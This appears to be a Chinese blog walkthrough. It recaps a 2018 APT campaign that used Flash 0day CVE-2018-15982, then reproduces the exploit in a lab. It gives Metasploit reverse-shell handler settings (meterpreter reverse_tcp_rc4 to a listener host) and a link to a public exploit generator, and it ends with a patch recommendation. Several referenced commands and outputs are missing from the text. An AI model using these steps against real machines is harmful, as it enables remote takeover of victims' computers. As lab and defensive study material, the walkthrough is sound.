2018年11月25日,乌俄两国又突发了“刻赤海峡”事件,乌克兰的数艘海军军舰在向刻赤海峡航行期间,与俄罗斯海军发生了激烈冲突,引发了全世界的高度关注。在2018年11月29日,“刻赤海峡”事件后稍晚时间,某团队立刻发起了针对俄罗斯的APT攻击行动。值得注意的是此次攻击相关样本来源于乌克兰,攻击目标则指向俄罗斯总统办公室所属的医疗机构。攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎。在发现攻击后,Adobe官方及时响应后在12月5日加急发布了新的Flash 32.0.0.101版本修复了此次的0day漏洞。
受影响版本包括:
下面我们就此版本进行漏洞攻击实验。
0X1 环境搭建
攻击机:kali3.0
靶 机: Win7/Win10,安装flash旧版本
0X2 漏洞利用
首先利用Metasploit的msfvenom创建payload攻击程序:
监听payload,用来接受反弹的shell:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
set LPORT 6666
set LHOST 192.168.0.104
set RC4PASSWORD zale
接下来,我们生成攻击的程序和网页,生成脚本EXP下载地址:
https://github.com/Ridter/CVE-2018-15982_EXP
通过-h参数查看脚本使用:
利用该脚本对刚才的文件进行利用,生成漏洞文件:
将该文件拷贝到kali下的web环境中,并开启apache服务:
我们在Win7上安装的flag版本是:Adobe_Flash_Player_28.0.0.111版本
安装完毕后,访问kali的http服务:
kali中查看监听设置,发现shell已经过来了:
0X3漏洞修复
升级到flash的最新版本
